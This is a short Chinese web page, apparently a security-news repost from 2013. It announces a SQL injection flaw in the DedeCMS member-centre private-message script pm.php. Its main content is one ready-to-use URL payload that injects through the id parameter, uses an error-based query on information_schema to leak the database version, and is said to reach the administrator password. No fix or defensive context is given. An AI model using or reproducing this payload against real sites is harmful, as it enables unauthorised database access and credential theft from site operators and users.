• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    DedeCMS会员中心短消息SQL注射0day漏洞

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

     需要:magic_quotes_gpc = Off

     

    DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等涛涛电脑知识

     

    看到微博上有人提了下,偶也发鸡肋了.

     

    /de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27

     

  • 上一篇:DedeCMS会员中心好友分组设置SQL注射0day漏洞
  • 下一篇:DedeCMS会员中心空间管理SQL注射0day漏洞
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1